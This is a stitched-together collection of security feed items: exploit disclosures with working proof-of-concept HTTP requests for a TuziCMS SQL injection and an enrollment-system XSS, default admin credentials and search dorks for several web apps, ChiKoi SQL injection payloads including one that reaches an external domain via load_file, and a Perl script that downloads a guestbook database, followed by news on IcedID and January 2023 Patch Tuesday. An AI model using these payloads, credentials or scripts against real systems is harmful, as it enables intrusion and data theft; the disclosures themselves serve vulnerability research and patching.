A vulnerability classified as critical was found in TuziCMS 2.0.6. This vulnerability affects the function delall of the file \App\Manage\Controller\KefuController.class.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-218152.

line: 157 - 196  
\` public function delall(){  
//dump($\_POST);  
//exit;  
$m=D('Advert'); //数据库表，配置文件中定义了表前缀，这里则不需要写  
$id = I('post.id');  
//dump($id);  
//exit;  
if ($id==null){  
$this->error('请选择删除项！');  
}  
//判断id是数组还是一个数值  
if(is\_array($id)){  
$where = 'id in('.implode(',',$id).')';  
//implode() 函数返回一个由数组元素组合成的字符串  
}else{  
$where = 'id='.$id;  
}  
//dump($where);  
//exit;

    	$m=M('Advert');
    	$arr=$m->where($where)->select();
    	
    	foreach ($arr as $key => $value){
    		$images=$value['advert_image'];
    		//dump($images);
    		//exit;
    		unlink('./Uploads/'.$images);
    	}
    	
    	$count=$m->where($where)->delete(); //修改表单用save函数
    	if ($count>0){
    		$this->success("成功删除{$count}条！");
    	}
    	else {
    		$this->error('批量删除失败！');
    	}
    
    }
    `
    

Because the security syntax of thinkphp framework is not used here, and $id is used to splice the $where variable for query, resulting in a serious SQL injection vulnerability. May cause serious harm to the system.

  

poc:  
\`POST /index.php/manage/kefu/delall HTTP/1.1  
Host: www.tuzi.com  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,_/_;q=0.8,application/signed-exchange;v=b3;q=0.9  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: PHPSESSID=4o7ddlgmm58fnm8ngse5v5eaq2  
x-forwarded-for: 8.8.8.8  
x-originating-ip: 8.8.8.8  
x-remote-ip: 8.8.8.8  
x-remote-addr: 8.8.8.8  
Connection: close  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 73

id=1/**/and/**/(extractvalue(1,concat(0x7e,(select/\*\*/user()),0x7e)))

\`

CVE-2023-0244: \App\Manage\Controller\KefuController.class.php has SQLinject · Issue #13 · yeyinshi/tuzicms

A cross-site scripting (XSS) vulnerability in the component /admin/register.php of Online Student Enrollment System v1.0 allows attackers to execute arbitrary web scripts via a crafted payload injected into the name parameter.

Permalink

Cannot retrieve contributors at this time

**Online Student Enrollment System v1.0 by donbermoy has Cross-site scripting**

BUG\_Author: mkwsj007

vendors:https://www.sourcecodester.com/php/14281/online-student-enrollment-system-using-phpmysqli.html

Vulnerability File: /student\_enrollment/admin/register.php

POST parameter 'name' exists Cross-site scripting vulnerability

Payload1: a"><script>alert(1)</script>b

    POST /student_enrollment/admin/register.php HTTP/1.1
    Host: 127.0.0.1
    Content-Length: 797
    Cache-Control: max-age=0
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Origin: http://127.0.0.1
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMkbv5jtnvqBtc9PG
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://127.0.0.1/student_enrollment/admin/register.php
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Cookie: PHPSESSID=j9loi161fde5rq6oo1jkuelrcn
    Connection: close
    
    ------WebKitFormBoundaryMkbv5jtnvqBtc9PG
    Content-Disposition: form-data; name="name"
    
    a"><script>alert(1)</script>b
    ------WebKitFormBoundaryMkbv5jtnvqBtc9PG
    Content-Disposition: form-data; name="email"
    
    c@gmail.com
    ------WebKitFormBoundaryMkbv5jtnvqBtc9PG
    Content-Disposition: form-data; name="username"
    
    d
    ------WebKitFormBoundaryMkbv5jtnvqBtc9PG
    Content-Disposition: form-data; name="password"
    
    e
    ------WebKitFormBoundaryMkbv5jtnvqBtc9PG
    Content-Disposition: form-data; name="c_password"
    
    e
    ------WebKitFormBoundaryMkbv5jtnvqBtc9PG
    Content-Disposition: form-data; name="photo"; filename=""
    Content-Type: application/octet-stream
    
    
    ------WebKitFormBoundaryMkbv5jtnvqBtc9PG
    Content-Disposition: form-data; name="register"
    
    
    ------WebKitFormBoundaryMkbv5jtnvqBtc9PG--
    

Payload2: a"><script>alert(document.cookie)</script>b

    POST /student_enrollment/admin/register.php HTTP/1.1
    Host: 127.0.0.1
    Content-Length: 811
    Cache-Control: max-age=0
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Origin: http://127.0.0.1
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryo4AaLx6Ali4mxyDj
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://127.0.0.1/student_enrollment/admin/register.php
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Cookie: PHPSESSID=j9loi161fde5rq6oo1jkuelrcn
    Connection: close
    
    ------WebKitFormBoundaryo4AaLx6Ali4mxyDj
    Content-Disposition: form-data; name="name"
    
    a"><script>alert(document.cookie)</script>b
    ------WebKitFormBoundaryo4AaLx6Ali4mxyDj
    Content-Disposition: form-data; name="email"
    
    c@gmail.com
    ------WebKitFormBoundaryo4AaLx6Ali4mxyDj
    Content-Disposition: form-data; name="username"
    
    d
    ------WebKitFormBoundaryo4AaLx6Ali4mxyDj
    Content-Disposition: form-data; name="password"
    
    e
    ------WebKitFormBoundaryo4AaLx6Ali4mxyDj
    Content-Disposition: form-data; name="c_password"
    
    e
    ------WebKitFormBoundaryo4AaLx6Ali4mxyDj
    Content-Disposition: form-data; name="photo"; filename=""
    Content-Type: application/octet-stream
    
    
    ------WebKitFormBoundaryo4AaLx6Ali4mxyDj
    Content-Disposition: form-data; name="register"
    
    
    ------WebKitFormBoundaryo4AaLx6Ali4mxyDj--

CVE-2022-46503: bug_report/XSS-1.md at main · mkwsj007/bug_report

Foloosi Shopping version 5.5.7 appears to leave a default administrative account in place post installation.

    ====================================================================================================================================| # Title     : Foloosi Shopping v5.5.7 Insecure Settings Vulnerability                                                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(64-bit)                                              | | # Vendor    : https://www.foloosishopping.com/                                                                                   |  | # Dork      : "category/beauty-health-hair"                                                                                      |====================================================================================================================================poc :[+] The vulnerability is about leaving the default settings    During the installation of the script and using the default username and password  [+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : user=admin@example.com  & pass=123456 [+] https://127.0.0.1/loginGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Foloosi Shopping 5.5.7 Insecure Settings

Flex version 5.2.2 appears to leave a default administrative account in place post installation.

    ====================================================================================================================================| # Title     : Flex Version: 5.22 Insecure Settings Vulnerability                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit)                                              | | # Vendor    : https://csimmobiliere.com                                                                                          |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] The vulnerability is about leaving the default settings    During the installation of the script and using the default username and password  [+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : user=botble  & pass=159357 [+] https://127.0.0.1/Flex/admin/loginGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Flex 5.22 Insecure Settings

ChiKoi version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: ChiKoi-1.0 SQLi## Author: nu11secur1ty## Date: 01.12.2023## Vendor: https://chikoiquan.tanhongit.com/## Software: https://github.com/tanhongit/new-mvc-shop/releases/tag/v1.0## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/tanhongit/2023/ChiKoi## Description:The `User-Agent` HTTP header appears to be vulnerable to SQL injection attacks.The payload '+(selectload_file('\\\\v3z9cjkbngnzrm7piruwhl6olfr8fzknbqzlmba0.glumar.com\\quv'))+'was submitted in the User-Agent HTTP header.This payload injects a SQL sub-query that calls MySQL's load_filefunction with a UNC file path that references a URL on an externaldomain.The attacker can steal all information from this system and canseriously harm the users of this system,such as extracting bank accounts through which they pay each other, etc.## STATUS: HIGH Vulnerability - CRITICAL[+] Payload:```MySQL---Parameter: User-Agent (User-Agent)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)    Payload: Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.1.9)Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)' WHERE 2474=2474 AND9291=(SELECT (CASE WHEN (9291=9291) THEN 9291 ELSE (SELECT 4553 UNIONSELECT 6994) END))-- -    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.1.9)Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)' WHERE 4578=4578 AND(SELECT 8224 FROM(SELECT COUNT(*),CONCAT(0x71706b7171,(SELECT(ELT(8224=8224,1))),0x716a6a6271,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VCWR---```[+] Online:```MySQL---Parameter: User-Agent (User-Agent)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)    Payload: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1)Gecko/20060601 Firefox/2.0 (Ubuntu-edgy)' WHERE 8386=8386 AND8264=(SELECT (CASE WHEN (8264=8264) THEN 8264 ELSE (SELECT 2322 UNIONSELECT 6426) END))-- ----```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/tanhongit/2023/ChiKoi)## Proof and Exploit:[href](https://streamable.com/7x69yz)## Time spent`01:30:00`## Writing an exploit`00:05:00`

ChiKoi 1.0 SQL Injection

Deprixa Pro version 7.5 appears to leave a default administrative account in place post installation.

    ====================================================================================================================================| # Title     : DEPRIXA Pro V7.5 Insecure Settings Vulnerability                                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit)                                              | | # Vendor    : https://deprixacargo.link/                                                                                         |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] The vulnerability is about leaving the default settings    During the installation of the script and using the default username and password  [+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : user=admin & pass=09731 [+] https://127.0.0.1/deprixaprosite/demo/login.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Deprixa Pro 7.5 Insecure Settings

Blesta version 5.4.1 appears to leave a default administrative account in place post installation.

    ====================================================================================================================================| # Title     : blesta 5.4.1 Insecure Settings Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit)                                            | | # Vendor    : https://account.blesta.com/client/plugin/download_manager/client_main/download/209/blesta-5.4.1.zip                |  | # Dork      : Powered by Blesta, © Phillips Data, Inc.                                                                           |====================================================================================================================================poc :[+] The vulnerability is about leaving the default settings    During the installation of the script and using the default username and password[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : user=admin & pass=password [+] https://127.0.0.1/blesta/admin/login/Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Blesta 5.4.1 Insecure Settings

A recent IcedID malware attack enabled the threat actor to compromise the Active Directory domain of an unnamed target less than 24 hours after gaining initial access.
"Throughout the attack, the attacker followed a routine of recon commands, credential theft, lateral movement by abusing Windows protocols, and executing Cobalt Strike on the newly compromised host," Cybereason researchers said in

Active Directory / Malware

A recent IcedID malware attack enabled the threat actor to compromise the Active Directory domain of an unnamed target less than 24 hours after gaining initial access.

"Throughout the attack, the attacker followed a routine of recon commands, credential theft, lateral movement by abusing Windows protocols, and executing Cobalt Strike on the newly compromised host," Cybereason researchers said in a report published this week.

IcedID, also known by the name BokBot, started its life as a banking trojan in 2017 before evolving into a dropper for other malware, joining the likes of Emotet, TrickBot, Qakbot, Bumblebee, and Raspberry Robin.

Attacks involving the delivery of IcedID have leveraged a variety of methods, especially in the wake of Microsoft's decision to block macros from Office files downloaded from the web.

The intrusion detailed by Cybereason is no different in that the infection chain begins with an ISO image file contained within a ZIP archive that culminates in the execution of the IcedID payload.

The malware then establishes persistence on the host via a scheduled task and communicates with a remote server to download additional payloads, including Cobalt Strike Beacon for follow-on reconnaissance activity.

It also carries out lateral movement across the network and executes the same Cobalt Strike Beacon in all those workstations, and then proceeds to install Atera agent, a legitimate remote administration tool, as a redundant remote access mechanism.

"Utilizing IT tools like this allows attackers to create an additional 'backdoor' for themselves in the event their initial persistence mechanisms are discovered and remediated," the researchers said. "These tools are less likely to be detected by antivirus or EDR and are also more likely to be written off as false positives."

The Cobalt Strike Beacon is further used as a conduit to download a C# tool dubbed Rubeus for credential theft, ultimately permitting the threat actor to move laterally to a Windows Server with domain admin privileges.

The elevated permissions are then weaponized to stage a DCSync attack, allowing the adversary to simulate the behavior of a domain controller (DC) and retrieve credentials from other domain controllers.

Other tools used as part of the attack include a legitimate utility named netscan.exe to scan the network for lateral movement as well as the rclone file syncing software to exfiltrate directories of interest to the MEGA cloud storage service.

The findings come as researchers from Team Cymru shed more light on the BackConnect (BC) protocol used by IcedID to deliver additional functionality post compromise, including a VNC module that provides a remote-access channel.

"In the case of BC, there appears to be two operators managing the overall process within distinct roles," the researchers noted last month, adding "much of the activity \[...\] occurs during the typical working week."

The development also follows a report from Proofpoint in November 2022 that a resurgence in Emotet activity has been linked to the distribution of a new version of IcedID.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

IcedID Malware Strikes Again: Active Directory Domain Compromised in Under 24 Hours

2ad Guestbook version 2.0 suffers from a database disclosure vulnerability.

====================================================================================================================================  
| # Title     : 2ad guestbook version 2.0 Database Disclosure Exploit                                                              |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit)                                              |   
| # Vendor    : http://www.2ad.free.fr                                                                                             |    
| # Dork      :                                                                                                                    |  
====================================================================================================================================

poc :

[-] Download the database: 

    The following Perl exploit will attempt to download the (livre-or.mdbsmdb.mdb ) file  
    The (livre-or.mdbsmdb.mdb) It is the database and contains all the data .

  [+] Dorking İn Google Or Other Search Enggine.

[+] save code as perl file : poc.pl

[+] code :

#!/usr/bin/perl -w  
#  
# 2ad guestbook version 2.0 Database Disclosure Exploit   
#  
# Author : indoushka  
#  
# Vondor :  http://www.2ad.free.fr

   use LWP::Simple;  
use LWP::UserAgent;

system('cls');  
print "\n[+] 2ad guestbook version 2.0 Database Disclosure Exploit [+] \n\n";  
system('color a');

if(@ARGV < 2)  
{  
print "[-]How To Use\n\n";  
&help; exit();  
}  
sub help()  
{  
print "[+] usage1 : perl $0 site.com /path/ \n";  
print "[+] usage2 : perl $0 localhost / \n";  
}  
($TargetIP, $path, $File,) = @ARGV;

$File="db/livre-or.mdbsmdb.mdb";  
my $url = "http://" . $TargetIP . $path . $File;  
print "\n Fuck you wait!!! \n\n";

my $useragent = LWP::UserAgent->new();  
my $request = $useragent->get($url,":content_file" => "D:/livre-or.mdb");

if ($request->is_success)  
{  
print "[+] $url Exploited!\n\n";  
print "[+] Database saved to D:/livre-or.mdb\n";  
exit();  
}  
else  
{  
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";  
exit();  
}

Greetings to :=========================================================================================================================  
                                                                                                                                      |  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |          
                                                                                                                                      |  
=======================================================================================================================================

2ad Guestbook 2.0 Database Disclosure

Categories: Exploits and vulnerabilities
Categories: News
Tags: patch Tuesday

Tags:  CVE-2023-21674

Tags:  APLC

Tags:  CVE-2023-21743

Tags:  Sharepoint

Tags:  CVE-2023-21563

Tags:  BitLocker

The second Tuesday of the year brings us many updates, including one for an actively exploited vulnerability that could lead to elevation of privileges



(Read more...)




The post Update now! Patch Tuesday January 2023 includes one actively exploited vulnerability appeared first on Malwarebytes Labs.

The first Microsoft Patch Tuesday of 2023 is an important one to start of the year with. In total 98 vulnerabilities were patched, including 11 that were labelled critical and one that is being actively exploited in the wild.

This is also the last time we expect to see fixes for Windows 8.1 included, since the support for Windows 8.1 ended January 10, 2023.

**ALPC**

Let’s start with the vulnerability that was found to be actively exploited in the wild. Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). The actively exploited vulnerability is listed as CVE-2023-21674.

The flaw is an Elevation of Privilege  (EoP) vulnerability in the Windows Advanced Local Procedure Call (ALPC). ALPC is an inter-process communication (IPC) facility provided by the Microsoft Windows kernel. The ALPC is an ideal attack surface for EoP vulnerabilities since it helps client processes communicate with server processes. So a vulnerability in this facility could be used to give a malicious client process the permissions of a service process, which are often SYSTEM privileges.

An EoP vulnerability by itself is not always of much use to an attacker, unless they can use the gained privileges to further compromise the target system. So it is likely that is has been spotted in the wild in combination or in a chain with other vulnerabilities.

The Cybersecurity and Infrastructure Security Agency (CISA) has added the vulnerability to its catalog of actively exploited vulnerabilities, urging federal agencies to apply patches by January 31, 2023.

**SharePoint Server**

Another vulnerability that deserves your immediate attention if you’re a Microsoft SharePoint Server user, is listed as CVE-2023-21743—a SharePoint Server security feature bypass vulnerability. In a network-based attack, an unauthenticated attacker could bypass authentication and make an anonymous connection. According to Microsofts’ description, exploitation is more likely and exploitation requires no user interaction.

It is very important to note that users have to trigger a SharePoint upgrade action, which is included in this update, to protect their SharePoint farm. The upgrade action can be triggered by running the SharePoint Products Configuration Wizard, the _Upgrade-SPFarm_ PowerShell cmdlet, or the "_psconfig.exe -cmd upgrade -inplace b2b_" command on each SharePoint server after installing the update.

**BitLocker**

Another interesting one, albeit only for those that use BitLocker, is CVE-2023-21563, a BitLocker security feature bypass vulnerability. BitLocker is a Windows volume encryption technology that protects your data from unauthorized access by encrypting your drive. Many travellers and remote workers trust BitLocker to keep sensitive data safe from prying eyes in case a laptop is lost or stolen. This flaw allows a successful attacker to bypass the BitLocker Device Encryption feature on the system storage device. Which means an attacker with physical access to the target system could exploit this vulnerability to gain access to encrypted data.

**Other updates**

Other vendors have synchronized their periodic updates with Microsoft. Here are few major ones that you may find in your environment.

**Adobe** released four patches to fix vulnerabilities in Acrobat and Reader, InDesign, InCopy, and Dimension software.

**Cisco** released security updates for its IP Phone 7800 and 8800 phones.

**Fortinet** published its monthly advisory covering issues in several of their products.

**Google** patched 60 vulnerabilities in the first Android update of 2023

**Intel** published a oneAPI Toolkit software advisory.

**SAP** published 12 new and updated patches.

**Synology** issued an advisory about a vulnerability that allows remote attackers to execute arbitrary commands through a susceptible version of VPN Plus Server.

Tag

#windows